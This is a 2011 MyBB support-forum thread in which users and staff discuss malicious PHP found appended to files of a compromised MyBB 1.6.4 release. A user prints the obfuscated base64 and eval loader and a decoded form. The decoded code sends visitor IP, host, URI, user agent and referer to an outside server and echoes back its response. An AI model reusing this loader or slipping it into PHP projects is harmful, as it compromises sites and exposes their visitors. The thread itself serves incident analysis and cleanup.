MyBB Community Forums

I had some added code at the very end of my modified files:

// All on one line, formatted for the post including line breaks and one space
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';
eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTI zNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));
$ip = $_SERVER['REMOTE_ADDR'];
$host = $_SERVER['HTTP_HOST'];
$uri = urlencode($_SERVER['REQUEST_URI']);
$ref = urlencode($_SERVER['HTTP_REFERER']);
$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref;
$tmp = file_get_contents($url);
echo $tmp;
?>

Decoded (after parsing through evals and retardedly simple "encryption"):

$_F=__FILE__;
$url = 'http://96.196.216.30/bt.php';
$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));
$ip = $_SERVER['REMOTE_ADDR'];
$host = $_SERVER['HTTP_HOST'];
$uri = urlencode($_SERVER['REQUEST_URI']);
$ref = urlencode($_SERVER['HTTP_REFERER']);
$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref;
$tmp = file_get_contents($url);
echo $tmp;

Actually, I might be missing something in the URL assignment...

No insecure templates reported. I tried visiting the url manually with bogus values (like ip=nope.sorry and ua=manual) but nothing happened, just a connection timeout.

Just wondering, how'd this even get in 1.6.4?

I wonder update already ? security

(2011-10-13, 06:42 PM)Paul H. Wrote: [ -> ]Just wondering, how'd this even get in 1.6.4?

From what we've gathered so far, someone compromised the main MyBB site which allowed them to modify the release without us knowing. Chris has been taking a look and has narrowed down the exploit.

The structure of the MyBB site means that the information held here - and other sub-domains - is safe. We're working to make the affected area safe and looking at other options in the mean time.

(2011-10-13, 07:50 PM)Tomm M Wrote: [ -> ]

(2011-10-13, 06:42 PM)Paul H. Wrote: [ -> ]Just wondering, how'd this even get in 1.6.4?

From what we've gathered so far, someone compromised the main MyBB site which allowed them to modify the release without us knowing. Chris has been taking a look and has narrowed down the exploit.

The structure of the MyBB site means that the information held here - and other sub-domains - is safe. We're working to make the affected area safe and looking at other options in the mean time.

Thank, I will update I check it on file soon!

I think this thread will make hackers alert too!

(2011-10-13, 08:16 PM)sunjava1 Wrote: [ -> ]I think this thread will make hackers alert too!

its already listed on several sites. best to keep the community informed now

I have got to fix the malicious files, renaming and replacing and deleting them. So, we are done, now.

Lots of thanks to you @ Tomm

I don't need to replace the missing files, because these files belong to the install folder which I deleted after the upgrade.

Quite strange to see an exploit already.

There is something strange happening...

When I delete spam on-board via Moderator-CP I see later that I accepted these files. But I did not accept them, they all are deleted. I saw that yesterday for the first time. Never had it before. I was very surprised.

What's going wrong? Is it fixed now?